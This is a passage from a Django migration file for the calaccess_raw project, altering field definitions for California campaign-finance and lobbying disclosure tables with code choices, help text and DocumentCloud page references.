field=calaccess_raw.fields.CharField(blank=True, choices=[('PE', 'Pre-Election (F450, F460)'), ('QT', 'Quarterly Stmt (F450,F460)'), ('SA', 'Semi-annual (F450, F460)'), ('SE', 'Supplemental Pre-elect (F450, F460, F495)'), ('SY', 'Special Odd-Yr. Campaign (F450, F460)'), ('S1', 'Semi-Annual (Jan1-Jun30) (F425)'), ('S2', 'Semi-Annual (Jul1-Dec31) (F425)'), ('TS', 'Termination Statement (F450, F460)'), ('pe', 'Pre-Election (F450, F460)'), ('qt', 'Quarterly Stmt (F450,F460)'), ('sa', 'Semi-annual (F450, F460)'), ('se', 'Supplemental Pre-elect (F450, F460, F495)'), ('sy', 'Special Odd-Yr. Campaign (F450, F460)'), ('ts', 'Termination Statement (F450, F460)'), ('**', 'Amendment'), ('1', 'Unknown'), ('2', 'Unknown'), ('CA', 'Unknown'), ('MD', 'Unknown'), ('NA', 'Unknown'), ('PR', 'Unknown'), ('QS', 'Unknown'), ('S', 'Unknown'), ('x', 'Unknown'), ('YE', 'Unknown')], db_column='STMT_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=7), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=18), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=23)], help_text='Type of statement', max_length=2),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SUPPORT'), ('O', 'OPPOSITION'), ('s', 'SUPPORT'), ('o', 'OPPOSITION')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=28), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=14), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=21), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=28)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='cvre530cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATH', 'Authorizing individual'), ('ATR', 'Assistant treasurer'), ('BMC', 'Ballot measure committee'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('IND', 'Individual'), ('MDI', 'Major Donor/Ind Expenditure'), ('OFF', 'Officer'), ('OTH', 'Other'), ('POF', 'Principal officer'), ('PRO', 'Proponent'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('SMO', 'Slate-mailer organization'), ('SPO', 'Sponsor'), ('TRE', 'Treasurer')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9)], help_text='entity code', max_length=32, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvre530cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('E530', 'Electronic Form 530: Electronic Issue Advocacy Report')], db_column='FORM_TYPE', db_index=True, help_text='Name of the source filing form or schedule', max_length=4, verbose_name='form type'),
),
migrations.AlterField(
model_name='cvrf470cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CAO', 'Candidate/officeholder')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text="The filer's entity code. The value of this column will always be Candidate/Office Holder (CAO) for this table.", max_length=3),
),
migrations.AlterField(
model_name='cvrf470cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F470', 'Form 470: Campaign Disclosure Statement, Short Form (Officeholders and Candidates)')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text='Type of Filing or Formset. The value of this column will always be equal to F470.', max_length=4),
),
migrations.AlterField(
model_name='cvrf470cd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text='Office Jurisdiction Code', max_length=3),
),
migrations.AlterField(
model_name='cvrf470cd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=30)], help_text='Office Sought/Held code. Legal values are "S" for sought and "H" for held.', max_length=1),
),
migrations.AlterField(
model_name='cvrf470cd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=22), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text='Code that identifies the office being sought. See the CAL document for a list of valid codes.', max_length=3),
),
migrations.AlterField(
model_name='cvrlobbydisclosurecd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CLI', 'Unknown'), ('FRM', 'Lobbying Firm'), ('IND', 'Person (spending > $5000)'), ('LBY', 'Lobbyist (an individual)'), ('LCO', 'Lobbying Coalition'), ('LEM', 'Lobbying Employer'), ('OTH', 'Other')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=53), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=67)], help_text='Entity Code describing the filer', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvrlobbydisclosurecd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=53), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=66)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvrregistrationcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BUS', 'Unknown'), ('FRM', 'Lobbying Firm'), ('LBY', 'Lobbyist (an individual)'), ('LCO', 'Lobbying Coalition'), ('LEM', 'Lobbying Employer')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=82), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=68)], help_text='Entity Code describing the filer', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvrregistrationcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=68), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=82)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvrsocd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BMC', 'Ballot measure committee'), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('RCP', 'Recipient committee'), ('SMO', 'Slate-mailer organization')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=46), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=59)], help_text='Entity Code of the Filer. Values: SMO - Slate Mailer Organization (F400,402) [COM|RCP] - Recipient Committee (F410)', max_length=3, verbose_name='Entity code'),
),
migrations.AlterField(
model_name='cvrsocd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400: Statement of Organization (Slate Mailer Organization)'), ('F402', 'Form 402: Statement of Termination (Slate Mailer Organization)'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=46), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=59)], help_text='Name of the source filing form or schedule', max_length=4, verbose_name='form type'),
),
migrations.AlterField(
model_name='debtcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BNM', "Ballot measure's name/title"), ('COM', 'Committee'), ('IND', 'Individual'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=33), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=45)], help_text='Entity code describing the payee', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='debtcd',
name='expn_code',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CMP', 'campaign paraphernalia/miscellaneous'), ('CNS', 'campaign consultants'), ('CTB', 'contribution (if nonmonetary, explain)*'), ('CVC', 'civic donations'), ('FIL', 'candidate filing/ballot fees'), ('FND', 'fundraising events'), ('IKD', 'In-kind contribution (nonmonetary)'), ('IND', 'independent expenditure supporting/opposing others (explain)*'), ('LEG', 'legal defense'), ('LIT', 'campaign literature and mailings'), ('LON', 'loan'), ('MBR', 'member communications'), ('MON', 'monetary contribution'), ('MTG', 'meetings and appearances'), ('OFC', 'office expenses'), ('PET', 'petition circulating'), ('PHO', 'phone banks'), ('POL', 'polling and survey research'), ('POS', 'postage, delivery and messenger services'), ('PRO', 'professional services (legal, accounting)'), ('PRT', 'print ads'), ('RAD', 'radio airtime and production costs'), ('RFD', 'returned contributions'), ('SAL', 'campaign workers salaries'), ('TEL', 'T.V. or cable airtime and production costs'), ('TRC', 'candidate travel, lodging and meals (explain)'), ('TRS', 'staff/spouse travel, lodging and meals (explain)'), ('TSF', 'transfer between committees of the same candidate/sponsor'), ('VOT', 'voter registration'), ('WEB', 'information technology costs (internet, e-mail)'), ('Fnd', 'fundraising events'), ('ofc', 'office expenses'), ("'CN", 'campaign consultants'), ('*', 'Unknown'), ('AIR', 'Unknown'), ('BUS', 'Unknown'), ('C', 'Unknown'), ('CAM', 'Unknown'), ('CC', 'Unknown'), ('COM', 'Unknown'), ('CON', 'Unknown'), ('CSN', 'Unknown'), ('DEP', 'Unknown'), ('EVE', 'Unknown'), ('F', 'Unknown'), ('FED', 'Unknown'), ('fns', 'Unknown'), ('G', 'Unknown'), ('GGG', 'Unknown'), ('HOT', 'Unknown'), ('L', 'Unknown'), ('LDF', 'Unknown'), ('MEE', 'Unknown'), ('N', 'Unknown'), ('O', 'Unknown'), ('OTH', 'Unknown'), ('P', 'Unknown'), ('PEN', 'Unknown'), ('S', 'Unknown'), ('SPE', 'Unknown'), ('STA', 'Unknown'), ('T', 'Unknown'), ('TAX', 'Unknown'), ('TRA', 'Unknown'), ('V', 'Unknown'), ('X', 'Unknown')], db_column='EXPN_CODE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=11), calaccess_raw.annotations.DocumentCloud(end_page=14, id='2712034-Cal-Format-201', start_page=13)], help_text='Expense Code', max_length=3, verbose_name='expense code'),
),
migrations.AlterField(
model_name='debtcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule F, Accrued Expenses (Unpaid Bills)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=33), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=45)], help_text='Schedule Name/ID: (F - Sched F / Accrued Expenses)', max_length=1),
),
migrations.AlterField(
model_name='efsfilinglogcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400: Statement of Organization (Slate Mailer Organization)'), ('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F402', 'Form 402: Statement of Termination (Slate Mailer Organization)'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal'), ('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More'), ('BADFORMAT 253', 'Unknown'), ('form', 'Unknown')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=8, id='2711624-Overview', start_page=4)], help_text='Name of the source filing form or schedule', max_length=250, verbose_name='form type'),
),
migrations.AlterField(
model_name='expncd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('COM', 'Committee'), ('IND', 'Individual'), ('RCP', 'Recipient committee'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('SCC', 'Small Contributor Committee'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('MBR', 'Member of Association'), ('OFF', 'Officer'), ('0', 'Unknown'), ('PTH', 'Unknown'), ('RFD', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=31), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=42)], help_text='Entity Code describing payee', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='expncd',
name='expn_code',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CMP', 'campaign paraphernalia/miscellaneous'), ('CNS', 'campaign consultants'), ('CTB', 'contribution (if nonmonetary, explain)*'), ('CVC', 'civic donations'), ('FIL', 'candidate filing/ballot fees'), ('FND', 'fundraising events'), ('IKD', 'In-kind contribution (nonmonetary)'), ('IND', 'independent expenditure supporting/opposing others (explain)*'), ('LEG', 'legal defense'), ('LIT', 'campaign literature and mailings'), ('LON', 'loan'), ('MBR', 'member communications'), ('MON', 'monetary contribution'), ('MTG', 'meetings and appearances'), ('OFC', 'office expenses'), ('PET', 'petition circulating'), ('PHO', 'phone banks'), ('POL', 'polling and survey research'), ('POS', 'postage, delivery and messenger services'), ('PRO', 'professional services (legal, accounting)'), ('PRT', 'print ads'), ('RAD', 'radio airtime and production costs'), ('RFD', 'returned contributions'), ('SAL', 'campaign workers salaries'), ('TEL', 'T.V. or cable airtime and production costs'), ('TRC', 'candidate travel, lodging and meals (explain)'), ('TRS', 'staff/spouse travel, lodging and meals (explain)'), ('TSF', 'transfer between committees of the same candidate/sponsor'), ('VOT', 'voter registration'), ('WEB', 'information technology costs (internet, e-mail)'), ('ctb', 'contribution (if nonmonetary, explain)*'), ('ikd', 'In-kind contribution (nonmonetary)'), ('Mon', 'monetary contribution'), ('ofc', 'office expenses'), ('OFc', 'office expenses'), ('Ofc', 'office expenses'), ('', 'Unknown'), ('*', 'Unknown'), ('0', 'Unknown'), ('001', 'Unknown'), ('011', 'Unknown'), ('200', 'Unknown'), ('401', 'Unknown'), ('ADV', 'Unknown'), ('ANN', 'Unknown'), ('APR', 'Unknown'), ('AUG', 'Unknown'), ('AUT', 'Unknown'), ('Ban', 'Unknown'), ('BAN', 'Unknown'), ('BOO', 'Unknown'), ('BOX', 'Unknown'), ('C', 'Unknown'), ('CAT', 'Unknown'), ('CC', 'Unknown'), ('CHE', 'Unknown'), ('CIV', 'Unknown'), ('CNT', 'Unknown'), ('CON', 'Unknown'), ('COP', 'Unknown'), ('CRE', 'Unknown'), ('CSN', 'Unknown'), ('CT', 'Unknown'), (',CT', 'Unknown'), ('.CT', 'Unknown'), ('CTN', 'Unknown'), ('CVD', 'Unknown'), ('DAT', 'Unknown'), ('DEC', 'Unknown'), ('Dem', 'Unknown'), ('DIN', 'Unknown'), ('Don', 'Unknown'), ('DON', 'Unknown'), ('Ear', 'Unknown'), ('EIM', 'Unknown'), ('EMP', 'Unknown'), ('F', 'Unknown'), ('FAX', 'Unknown'), ('FDN', 'Unknown'), ('FED', 'Unknown'), ('FEE', 'Unknown'), ('FIN', 'Unknown'), ('Fun', 'Unknown'), ('FUN', 'Unknown'), ('G', 'Unknown'), ('GEN', 'Unknown'), ('GGG', 'Unknown'), ('GOT', 'Unknown'), ('IEs', 'Unknown'), ('IN-', 'Unknown'), ('Ina', 'Unknown'), ('INK', 'Unknown'), ('INS', 'Unknown'), ('ITE', 'Unknown'), ('JAN', 'Unknown'), ('JUL', 'Unknown'), ('JUN', 'Unknown'), ('KIC', 'Unknown'), ('L', 'Unknown'), ('LEV', 'Unknown'), ('Lit', 'Unknown'), ('LN#', 'Unknown'), ('LOG', 'Unknown'), ('M', 'Unknown'), ('MAI', 'Unknown'), ('Mar', 'Unknown'), ('MAR', 'Unknown'), ('MAY', 'Unknown'), ('MED', 'Unknown'), ('MEE', 'Unknown'), ('MGT', 'Unknown'), ('Mis', 'Unknown'), ('MRB', 'Unknown'), ('NGP', 'Unknown'), ('NON', 'Unknown'), ('NOT', 'Unknown'), ('NOV', 'Unknown'), ('O', 'Unknown'), ('OCT', 'Unknown'), ('.OF', 'Unknown'), ('OFF', 'Unknown'), ('OPE', 'Unknown'), ('OTH', 'Unknown'), ('P', 'Unknown'), ('Pac', 'Unknown'), ('PAI', 'Unknown'), ('PAR', 'Unknown'), ('PAY', 'Unknown'), ('PEN', 'Unknown'), ('PMT', 'Unknown'), ('.PO', 'Unknown'), ('Pos', 'Unknown'), ('PRE', 'Unknown'), ('PRI', 'Unknown'), ('PRP', 'Unknown'), ('R', 'Unknown'), ('.Re', 'Unknown'), ('.RE', 'Unknown'), ('REF', 'Unknown'), ('REI', 'Unknown'), ('RFP', 'Unknown'), ('S', 'Unknown'), ('S-A', 'Unknown'), ('SA', 'Unknown'), ('Sal', 'Unknown'), ('S C', 'Unknown'), ('S.C', 'Unknown'), ('SCU', 'Unknown'), ('SEE', 'Unknown'), ('SEN', 'Unknown'), ('SEP', 'Unknown'), ('S.M.', 'Unknown'), ('SOF', 'Unknown'), ('SWI', 'Unknown'), ('T', 'Unknown'), ('TAX', 'Unknown'), ('TB', 'Unknown'), ('TB,', 'Unknown'), ('TIC', 'Unknown'), ('Tor', 'Unknown'), ('TRA', 'Unknown'), ('TRF', 'Unknown'), ('TRV', 'Unknown'), ('UN', 'Unknown'), ('UTI', 'Unknown'), ('V', 'Unknown'), ('VEN', 'Unknown'), ('-VO', 'Unknown'), ('VOI', 'Unknown'), ('VOY', 'Unknown'), ('WI', 'Unknown'), ('x', 'Unknown'), ('X', 'Unknown'), ('S-6', 'Unknown'), ('S.M', 'Unknown'), ('S-4', 'Unknown'), ('SA:', 'Unknown'), ('100', 'Unknown'), ('RFN', 'Unknown'), ('REN', 'Unknown'), ('003', 'Unknown'), ('S-1', 'Unknown'), ('08', 'Unknown')], db_column='EXPN_CODE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=11), calaccess_raw.annotations.DocumentCloud(end_page=14, id='2712034-Cal-Format-201', start_page=13)], help_text='The type of expenditure', max_length=3, verbose_name='expense code'),
),
migrations.AlterField(
model_name='expncd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F450P5', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 5, Payments Made'), ('D', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule D, Summary of Expenditures Supporting / Opposing Other Candidates, Measures and Committees'), ('E', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule E, Payments Made'), ('G', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule G, Payments Made by an Agent or Independent Contractor (on Behalf of This Committee)'), ('F461P5', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 5, Contributions (Including Loans, Forgiveness of Loans, and Loan Guarantees) and Expenditures Made'), ('F465P3', 'Form 465 (Supplemental Independent Expenditure Report): Part 3, Independent Expenditures Made'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=31), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=42)], help_text='Name of the source filing form or schedule', max_length=6),
),
migrations.AlterField(
model_name='expncd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('Cit', 'City'), ('sen', 'Senate District'), ('Sen', 'Senate District'), ('stw', 'Statewide'), ('APP', 'Statewide'), ('ASR', 'County'), ('ATT', 'Statewide'), ('GOV', 'Statewide'), ('LTG', 'Statewide'), ('SOS', 'Statewide'), ('SUP', 'Statewide'), ('TRE', 'Statewide'), ('BSU', 'County'), ('CSU', 'County'), ('ES', 'City'), ('SM', 'City'), ('BED', 'Other'), ('CCB', 'Other'), ('CCM', 'Other'), ('PDR', 'Other'), ('12', 'Senate District'), ('4', 'Statewide'), ('8', 'Statewide'), ('27', 'Statewide'), ('93', 'Statewide'), ('98', 'Statewide'), ('CLB', 'Unknown'), ('PER', 'Unknown'), ('Boa', 'Board of Equalization District'), ('Sta', 'Unknown'), ('STA', 'Unknown'), ('CA', 'Unknown'), ('SAN', 'Unknown'), ('ES ', 'Unknown'), ('CON', 'Unknown'), ('LA', 'Unknown'), ('LBC', 'Unknown'), ('OR', 'Unknown'), ('SB', 'Unknown'), ('WES', 'Unknown'), ('BM', 'Unknown'), ('(Lo', 'Unknown'), ('(Ci', 'Unknown'), ('vty', 'Unknown'), ('OC', 'Unknown'), ('SM ', 'Unknown'), ('ASS', 'Unknown'), ('JR', 'Unknown'), ('O', 'Unknown'), ('ADM', 'Unknown'), ('SAC', 'Unknown'), ('US', 'Unknown'), ('J', 'Unknown'), ('LOS', 'Unknown'), ('IRV', 'Unknown'), ('CO', 'Unknown'), ('JRS', 'Unknown'), ('NEV', 'Unknown'), ('IB', 'Unknown'), ('A', 'Unknown'), ('Ass', 'Unknown'), ('SD', 'Unknown'), ('D', 'Unknown'), ('SEC', 'Unknown'), ('SC', 'Unknown'), ('RB', 'Unknown'), ('GEN', 'Unknown'), ('CC', 'Unknown'), ('FED', 'Unknown'), ('FM', 'Unknown'), ('R', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=32), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=44)], help_text='Office Jurisdiction Code', max_length=3),
),
migrations.AlterField(
model_name='expncd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT'), ('s', 'SOUGHT'), ('h', 'HELD'), ('A', 'UNKNOWN'), ('a', 'UNKNOWN'), ('8', 'UNKNOWN'), ('O', 'UNKNOWN')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=32), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=44)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='expncd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('Cou', 'County Counsel'), ('sen', 'State Senator'), ('AtT', 'Attorney General'), ('May', 'Mayor'), ('Sen', 'State Senator'), ('asm', 'State Assembly Person'), ('gov', 'Governor'), ('Gov', 'Governor'), ('LA', 'Unknown'), ('HOU', 'Unknown'), ('LAD', 'Unknown'), ('11A', 'Unknown'), ('001', 'Unknown'), ('BM', 'Unknown'), ('AS1', 'Unknown'), ('ASS', 'Unknown'), ('73', 'Unknown'), ('CIT', 'Unknown'), ('HSE', 'Unknown'), ('LT', 'Unknown'), ('CTY', 'Unknown'), ('STA', 'Unknown'), ('GO', 'Unknown'), ('CO', 'Unknown'), ('A', 'Unknown'), ('PAC', 'Unknown'), ('REP', 'Unknown'), ('OFF', 'Unknown'), ('SE', 'Unknown'), ('031', 'Unknown'), ('COM', 'Unknown'), ('ASB', 'Unknown'), ('OT', 'Unknown'), ('NAT', 'Unknown'), ('CC', 'Unknown'), ('SWE', 'Unknown'), ('FED', 'Unknown'), ('STE', 'Unknown'), ('H', 'Unknown'), ('DA', 'Unknown'), ('S', 'Unknown'), ('AS', 'Unknown'), ('OF', 'Unknown'), ('LEG', 'Unknown'), ('STW', 'Unknown'), ('ST', 'Unknown'), ('PRE', 'Unknown'), ('/S', 'Unknown'), ('U S', 'Unknown'), ('O', 'Unknown'), ('8', 'Unknown'), ('C:S', 'Unknown')], db_column='OFFICE_CD', 